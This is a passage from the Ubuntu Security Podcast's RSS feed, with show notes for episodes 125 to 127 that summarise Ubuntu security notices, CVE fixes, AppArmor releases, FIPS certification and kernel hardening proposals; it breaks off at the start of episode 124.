found multiple issues - HTTP/2 desync attacks - allow to possibly hijack
clients, poison caches, and steal credentials</li>
<li><a href="https://www.mail-archive.com/haproxy@formilux.org/msg41041.html">Initially HAProxy upstream</a> thought they were safe but then found after
more analysis they were vulnerable to a few of the possible issues
<ul>
<li>Can be mitigated by disabling HTTP/2 or just install these updates :)</li>
</ul>
</li>
</ul>
<h3 id="usn-5043-1-exiv2-vulnerabilities-06-04">[<a href="https://ubuntu.com/security/notices/USN-5043-1">USN-5043-1</a>] Exiv2 vulnerabilities [06:04]</h3>
<ul>
<li>11 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-37623">CVE-2021-37623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37621">CVE-2021-37621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37619">CVE-2021-37619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37618">CVE-2021-37618</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37616">CVE-2021-37616</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37615">CVE-2021-37615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34335">CVE-2021-34335</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37622">CVE-2021-37622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37620">CVE-2021-37620</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34334">CVE-2021-34334</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32815">CVE-2021-32815</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Slew of issues discovered by Kevin Backhouse from Github security team</li>
<li>C++ - so usual mix of issues - OOB read, NULL ptr deref, floating point
exception (div/0), infinte loop, assertion failure - all DoS</li>
</ul>
<h3 id="usn-5039-1-linux-kernel-vulnerability-06-49">[<a href="https://ubuntu.com/security/notices/USN-5039-1">USN-5039-1</a>] Linux kernel vulnerability [06:49]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-22555">CVE-2021-22555</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>netfilter setsockopt()</li>
</ul>
<h3 id="lsn-0080-1-linux-kernel-vulnerability-07-08">[<a href="https://ubuntu.com/security/notices/LSN-0080-1">LSN-0080-1</a>] Linux kernel vulnerability [07:08]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-22555">CVE-2021-22555</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5044-1-linux-kernel-vulnerabilities-07-39">[<a href="https://ubuntu.com/security/notices/USN-5044-1">USN-5044-1</a>] Linux kernel vulnerabilities [07:39]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3587">CVE-2021-3587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3573">CVE-2021-3573</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3564">CVE-2021-3564</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 bionic + ESM HWE</li>
<li>2 bluetooth UAF and 1 NFC NULL ptr deref</li>
</ul>
<h3 id="usn-5045-1-linux-kernel-vulnerabilities-08-06">[<a href="https://ubuntu.com/security/notices/USN-5045-1">USN-5045-1</a>] Linux kernel vulnerabilities [08:06]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3587">CVE-2021-3587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3573">CVE-2021-3573</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3564">CVE-2021-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34693">CVE-2021-34693</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 focal + bionic hwe</li>
<li>same as above plus CAN BCM uninitialised memory - info leak to local
attacker</li>
</ul>
<h3 id="usn-5046-1-linux-kernel-vulnerabilities-08-31">[<a href="https://ubuntu.com/security/notices/USN-5046-1">USN-5046-1</a>] Linux kernel vulnerabilities [08:31]</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3587">CVE-2021-3587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3573">CVE-2021-3573</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3564">CVE-2021-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28691">CVE-2021-28691</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-0129">CVE-2021-0129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26558">CVE-2020-26558</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.11 hirsute + focal hwe</li>
<li>bluetooth UAF, NFC NULL ptr deref, access control issue in bluetooth -
could allow a local attacker in range to expose info, xen PV issue -
attacker in guest could DoS/RCE on host</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="hiring-09-10">Hiring [09:10]</h3>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote">https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote</a></li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E127.mp3" length="8237529" type="audio/mpeg" /><itunes:duration>10:43</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 126
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-126/</link>
          <pubDate>Fri, 13 Aug 2021 15:04:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>1cf7484a0aad93fdbfe137c475da46ef305fbc882d3d7013ecd12d939ba6f0e3580d61129d5a14f1f6137f57891a709825cb23530f87b89d7ee6cc1dc8867208</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 126</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week Ubuntu 20.04 LTS was FIPS 140-2 certified plus the AppArmor
  project made some point releases, and we released security updates for
  Docker, Perl, c-ares, GPSd and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week Ubuntu 20.04 LTS was FIPS 140-2 certified plus the AppArmor
  project made some point releases, and we released security updates for
  Docker, Perl, c-ares, GPSd and more.
  </itunes:summary>
        <description>  This week Ubuntu 20.04 LTS was FIPS 140-2 certified plus the AppArmor
  project made some point releases, and we released security updates for
  Docker, Perl, c-ares, GPSd and more.
  </description>
        <googleplay:description>  This week Ubuntu 20.04 LTS was FIPS 140-2 certified plus the AppArmor
  project made some point releases, and we released security updates for
  Docker, Perl, c-ares, GPSd and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week Ubuntu 20.04 LTS was FIPS 140-2 certified plus the AppArmor
project made some point releases, and we released security updates for
Docker, Perl, c-ares, GPSd and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>2 unique CVEs addressed</p>
<h3 id="usn-5031-1-opencryptoki-vulnerability-00-54">[<a href="https://ubuntu.com/security/notices/USN-5031-1">USN-5031-1</a>] openCryptoki vulnerability [00:54]</h3>
<ul>
<li>Affecting Hirsute (21.04)</li>
<li>PKCS#11 daemon</li>
<li>Bug fix that was deemed to have security implications - so was going to
be done via SRU for 21.04 but instead we published via -security to
ensure all users received it</li>
<li>Thanks to Simon Chopin from Foundations team for preparing this update</li>
</ul>
<h3 id="usn-5032-1-usn-5032-2-docker-vulnerabilities-02-29">[<a href="https://ubuntu.com/security/notices/USN-5032-1">USN-5032-1</a>, <a href="https://ubuntu.com/security/notices/USN-5032-2">USN-5032-2</a>] Docker vulnerabilities [02:29]</h3>
<ul>
<li>Affecting Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)</li>
<li>Backport of the 20.10.7 version from 21.10 to older releases - this
includes a bunch of security fixes as well</li>
<li>Unfortunately as this is a version upgrade there are some changes that
may break existing containers - in particular, drops support for the aufs
storage driver so if you were using this you should upgrade your
configuration to use the overlayfs2 storage driver instead -
<a href="https://docs.docker.com/storage/storagedriver/overlayfs-driver/">https://docs.docker.com/storage/storagedriver/overlayfs-driver/</a> - this is
a bit involved since you need to export your images, switch the storage
driver, then load the images back one after another</li>
<li>Thanks for Lucas Kanashiro from Server team for preparing this update</li>
</ul>
<h3 id="usn-5033-1-perl-vulnerability-03-32">[<a href="https://ubuntu.com/security/notices/USN-5033-1">USN-5033-1</a>] Perl vulnerability [03:32]</h3>
<ul>
<li>1 CVEs addressed in Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-36770">CVE-2021-36770</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Perl Encode library could end up running arbitrary Perl code from the
current working directory - was introduced by a change in Encode 3.05 in
perl 5.32/5.34 so only affected &gt;= 21.04</li>
</ul>
<h3 id="usn-5034-1-usn-5034-2-c-ares-vulnerability-03-59">[<a href="https://ubuntu.com/security/notices/USN-5034-1">USN-5034-1</a>, <a href="https://ubuntu.com/security/notices/USN-5034-2">USN-5034-2</a>] c-ares vulnerability [03:59]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3672">CVE-2021-3672</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Lib for async name resolution</li>
<li>Failed to properly validate certain hostnames returned from DNS servers -
could allow a remote attacker to possibly perform domain hijacking
attacks</li>
</ul>
<h3 id="usn-5035-1-gpsd-vulnerability-04-28">[<a href="https://ubuntu.com/security/notices/USN-5035-1">USN-5035-1</a>] GPSd vulnerability [04:28]</h3>
<ul>
<li>Affecting Focal (20.04 LTS), Hirsute (21.04)</li>
<li>incorrectly handled certain leap second events which would result in the
time jumping back 1024 weeks on 2021-10-31</li>
<li>Upstream don&rsquo;t consider this a security issue per-se but given how
pervasive gpsd is used for handling GPS receivers which are often used
for high precision timing or positioning systems (self-driving cars?) -
this could have real-world security implications</li>
<li>Backported the fix from upstream - note this only affected gpsd &gt;= 3.20
so older versions in 18.04 LTS etc were not affected</li>
<li><a href="https://lwn.net/Articles/865044/">https://lwn.net/Articles/865044/</a></li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="apparmor-3-dot-0-dot-2-3-dot-0-dot-3-released-06-39">AppArmor 3.0.2 / 3.0.3 released [06:39]</h3>
<ul>
<li>Includes bug fixes for various issues plus updates to the policies for
things like PHP 8, widevine DRM in firefox, support reading of crypto
policies for SSL-using applications</li>
<li>Expected to land 3.0.3 for Ubuntu 21.10 (impish) before FF next week</li>
<li><a href="https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.0.2">https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.0.2</a></li>
<li><a href="https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.0.3">https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.0.3</a></li>
</ul>
<h3 id="fips-140-2-certification-for-ubuntu-20-dot-04-lts-07-44">FIPS 140-2 certification for Ubuntu 20.04 LTS! [07:44]</h3>
<ul>
<li>Enables organisations to run and develop applications and solutions for
the US public sector and Federal government including regulated
industries such as healthcare and finance</li>
<li>FIPS 140-2, Level 1 certification crypto modules in Ubuntu 20.04 LTS,
including OpenSSL 1.1.1
<ul>
<li>Linux kernel (crypto subsystem)</li>
<li>OpenSSL</li>
<li>Libgcrypt (used for LUKS for FDE so provides fully certified FDE
implementation)</li>
<li>StrongSwan (IPsec based VPN) *under validation</li>
</ul>
</li>
<li>Available through Ubuntu Advantage and Ubuntu Pro - On public clouds,
Ubuntu Pro for AWS​ and ​Ubuntu Pro for Azure​ include subscriptions to
Canonical’s FIPS 140-2 repositories, alongside expanded security and
hardening.</li>
<li>Future is FIPS 140-3 - aligns with ISO/IEC 19790 (Security requirements
for cryptographic modules)
<ul>
<li>Existing certifications under FIPS 140-2 have a sunset date of five
years from the validation date</li>
<li>Canonical is preparing Ubuntu for the new certification, and intends
to provide FIPS 140-3 certified cryptographic packages on a future
release of Ubuntu.</li>
</ul>
</li>
<li><a href="https://ubuntu.com/blog/fips-certification-ubuntu-20-04-lts">https://ubuntu.com/blog/fips-certification-ubuntu-20-04-lts</a></li>
<li>Full list of certifications at <a href="https://ubuntu.com/security/certifications">https://ubuntu.com/security/certifications</a></li>
</ul>
<h3 id="ubuntu-20-dot-04-dot-3-lts-release-delayed-until-august-26th-10-11">Ubuntu 20.04.3 LTS release delayed until August 26th [10:11]</h3>
<ul>
<li>Next point release for 20.04 LTS series - respin of install media with
latest security updates etc - includes newest shim - this is now unified
across various Ubuntu releases - installation media with this new version
fails to boot on certain Dell and Sony Vaio machines - fix for this is in
progress, plus the current RISC-V HWE kernel build PANIC&rsquo;s under certain
scenarios</li>
<li>Release team decided to delay the release by 1 week to ensure these bugs
can be fixed and new media spun up and tested adequetly before the
release</li>
<li><a href="https://discourse.ubuntu.com/t/focal-fossa-20-04-3-lts-point-release-status-tracking/22948">https://discourse.ubuntu.com/t/focal-fossa-20-04-3-lts-point-release-status-tracking/22948</a></li>
</ul>
<h3 id="hiring-11-27">Hiring [11:27]</h3>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote">https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote</a></li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E126.mp3" length="9793922" type="audio/mpeg" /><itunes:duration>12:39</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 125
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-125/</link>
          <pubDate>Fri, 06 Aug 2021 16:02:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>dfef16fbc8539e7511d69869af34645ac2622c75bfd6b4e5a913334bd9c6418cb6e50edddd6d06afef91c517b1d81d6389cbe1b127a34ac5f42151b7a8c43a7e</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 125</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we discuss new kernel memory hardening and security development
  proposals from Ubuntu Security Alumnus Kees Cook, plus we look at details
  of security updates for WebKitGTK, libsndfile, GnuTLS, exiv2 and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we discuss new kernel memory hardening and security development
  proposals from Ubuntu Security Alumnus Kees Cook, plus we look at details
  of security updates for WebKitGTK, libsndfile, GnuTLS, exiv2 and more.
  </itunes:summary>
        <description>  This week we discuss new kernel memory hardening and security development
  proposals from Ubuntu Security Alumnus Kees Cook, plus we look at details
  of security updates for WebKitGTK, libsndfile, GnuTLS, exiv2 and more.
  </description>
        <googleplay:description>  This week we discuss new kernel memory hardening and security development
  proposals from Ubuntu Security Alumnus Kees Cook, plus we look at details
  of security updates for WebKitGTK, libsndfile, GnuTLS, exiv2 and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we discuss new kernel memory hardening and security development
proposals from Ubuntu Security Alumnus Kees Cook, plus we look at details
of security updates for WebKitGTK, libsndfile, GnuTLS, exiv2 and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>22 unique CVEs addressed</p>
<h3 id="usn-5024-1-webkitgtk-vulnerabilities-00-57">[<a href="https://ubuntu.com/security/notices/USN-5024-1">USN-5024-1</a>] WebKitGTK vulnerabilities [00:57]</h3>
<ul>
<li>13 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-30799">CVE-2021-30799</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30797">CVE-2021-30797</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30795">CVE-2021-30795</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30758">CVE-2021-30758</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30749">CVE-2021-30749</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30744">CVE-2021-30744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30734">CVE-2021-30734</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30720">CVE-2021-30720</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30689">CVE-2021-30689</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30665">CVE-2021-30665</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30663">CVE-2021-30663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21779">CVE-2021-21779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21775">CVE-2021-21775</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Every 5-10 weeks so time for another one</li>
<li>Usual web / js engine issues - XSS, DoS, RCE etc</li>
</ul>
<h3 id="usn-4944-2-mariadb-regression-01-30">[<a href="https://ubuntu.com/security/notices/USN-4944-2">USN-4944-2</a>] MariaDB regression [01:30]</h3>
<ul>
<li>Affecting Focal (20.04 LTS)</li>
<li>Update announced back in <a href="https://ubuntusecuritypodcast.org/episode-115/">Episode 115</a> - MariaDB intends to be compatible
with MySQL but failed to include the caching_sha2_password.so module
which is the standard module used to authenticate in MySQL - as such
clients would not be able to connect since they expect to use this method
to authenticate by default. Upstream MariaDB fixed this in newer versions
and this update backports that fix to the version in Ubuntu 20.04</li>
</ul>
<h3 id="usn-5025-1-usn-5025-2-libsndfile-vulnerability-02-25">[<a href="https://ubuntu.com/security/notices/USN-5025-1">USN-5025-1</a>, <a href="https://ubuntu.com/security/notices/USN-5025-2">USN-5025-2</a>] libsndfile vulnerability [02:25]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3246">CVE-2021-3246</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow in wav decoder - possible RCE / DoS - found by
OSSFuzz</li>
</ul>
<h3 id="usn-5026-1-usn-5026-2-qpdf-vulnerabilities-02-58">[<a href="https://ubuntu.com/security/notices/USN-5026-1">USN-5026-1</a>, <a href="https://ubuntu.com/security/notices/USN-5026-2">USN-5026-2</a>] QPDF vulnerabilities [02:58]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-36978">CVE-2021-36978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18020">CVE-2018-18020</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS due to recursive parsing in the face of errors - fixed to instead
bail out if encounters too many successive errors as PDF is damaged in
this case anyway</li>
<li>Heap buffer overflow from crafted PDF - also found by OSSFuzz</li>
</ul>
<h3 id="usn-5027-1-usn-5027-2-pear-vulnerability-03-50">[<a href="https://ubuntu.com/security/notices/USN-5027-1">USN-5027-1</a>, <a href="https://ubuntu.com/security/notices/USN-5027-2">USN-5027-2</a>] PEAR vulnerability [03:50]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-32610">CVE-2021-32610</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Symlink path traversal in handling of tar archives in the Archive_Tar
module - since PEAR uses this directly when handling archives, it was
also vulnerable so could be made to overwrite arbitrary local files on
archive extraction and hence get code execution</li>
</ul>
<h3 id="usn-5029-1-gnutls-vulnerabilities-04-22">[<a href="https://ubuntu.com/security/notices/USN-5029-1">USN-5029-1</a>] GnuTLS vulnerabilities [04:22]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20232">CVE-2021-20232</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20231">CVE-2021-20231</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 possible UAF in certain scenarious - hard to exploit as need to be able
to predict the behaviour of glibc&rsquo;s memory allocator as well as GnuTLS&rsquo;s
own internal allocator but could possibly be used for RCE</li>
</ul>
<h3 id="usn-5028-1-exiv2-vulnerability-04-57">[<a href="https://ubuntu.com/security/notices/USN-5028-1">USN-5028-1</a>] Exiv2 vulnerability [04:57]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-31291">CVE-2021-31291</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>More exiv2 (last seen in <a href="https://ubuntusecuritypodcast.org/episode-115/">Episode 115</a> and <a href="https://ubuntusecuritypodcast.org/episode-117/">Episode 117</a>)</li>
<li>Heap buffer overflow in handling of jpeg image metadata - DoS / RCE</li>
</ul>
<h3 id="usn-5030-1-perl-dbi-module-vulnerabilities-05-24">[<a href="https://ubuntu.com/security/notices/USN-5030-1">USN-5030-1</a>] Perl DBI module vulnerabilities [05:24]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14393">CVE-2020-14393</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2014-10402">CVE-2014-10402</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Incomplete fix for previous Perl DBI <a href="https://ubuntu.com/security/CVE-2014-10401">CVE-2014-10401</a> - would allow access
to files outside the original data source directory - was still
potentially vulnerable - fixed to parse attributes more strictly to avoid
this</li>
<li>Possible stack buffer overflow if using a really long perl package name
as a database driver - unlikely to actually be triggered in practice -
used a fixed size stack buffer and memcpy()&rsquo;d into it without checking
bounds - fixed to allocate the buffer on the heap to the exact required
size</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="upstream-kernel-memcpy-hardening-06-31">Upstream kernel memcpy() hardening [06:31]</h3>
<ul>
<li><a href="https://lwn.net/Articles/864521/">https://lwn.net/Articles/864521/</a></li>
<li>Ubuntu Security Alumnus Kees Cook</li>
<li>Aiming to make memcpy() within the kernel detect when
overwriting following structure members</li>
<li>Current kernel memcpy() is able to already detect when writing outside
the bounds of a given structure (when the structure size can be known at
either compile or run-time) - but can&rsquo;t handle detecting overwriting of
extra members within a structure</li>
<li>Uses the built-in features of GCC plus some C macro smarts to actually
allow this to be done in certain circumstances without triggering
warnigns - ie in some cases want to actually overwrite following
structure members like when handling network packets etc</li>
<li>Most cases are only able to be detected at runtime and since it is not
easy to statically determine all these call sites, for now this proposal
is warn-only - but in the future the hope is to make it enforcing so it
can actually stop possible buffer overflows</li>
<li>Also had this been present it would have detected the 11 previously known
memcpy() overflows so shows likely real-world promise as an extra
defensive measure</li>
</ul>
<h3 id="linux-kernel-security-done-right-09-29">Linux kernel security done right [09:29]</h3>
<ul>
<li><a href="https://security.googleblog.com/2021/08/linux-kernel-security-done-right.html">https://security.googleblog.com/2021/08/linux-kernel-security-done-right.html</a></li>
<li>More from Kees</li>
<li>Makes a strong case for having vendors track either latest released
kernel or one of the stable trees - instead of each manually backporting
patches etc - duplicated work</li>
<li>Then could devote engineers to working more upstream on testing,
hardening etc - which benefit everyone - ie by working upstream on a
common platform this reduces duplicated efforts and gains many
efficiencies</li>
</ul>
<h3 id="hiring-11-50">Hiring [11:50]</h3>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote">https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote</a></li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a></li>
</ul>
<h4 id="security-product-manager">Security - Product Manager</h4>
<ul>
<li><a href="https://canonical.com/careers/2278145/security-product-manager-remote">https://canonical.com/careers/2278145/security-product-manager-remote</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E125.mp3" length="9977091" type="audio/mpeg" /><itunes:duration>12:46</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 124
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-124/</link>
          <pubDate>Fri, 30 Jul 2021 14:46:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>d2899b04375c5cc8e92e37291c2a2b4bce70b742950e9fb74e649c4cc57db94e40d4895e1f98b2efe91802633a405fa32df0636f14f2bf40eab766c8ba1d5b27</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 124</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          It's another week when too many security updates are never enough as we
  cover 240 CVE fixes across Avahi, QEMU, the Linux kernel, containerd,
  binutils and more, plus the Ubuntu 20.10 Groovy Gorilla end-of-life.
  
        
        ]]></itunes:subtitle>
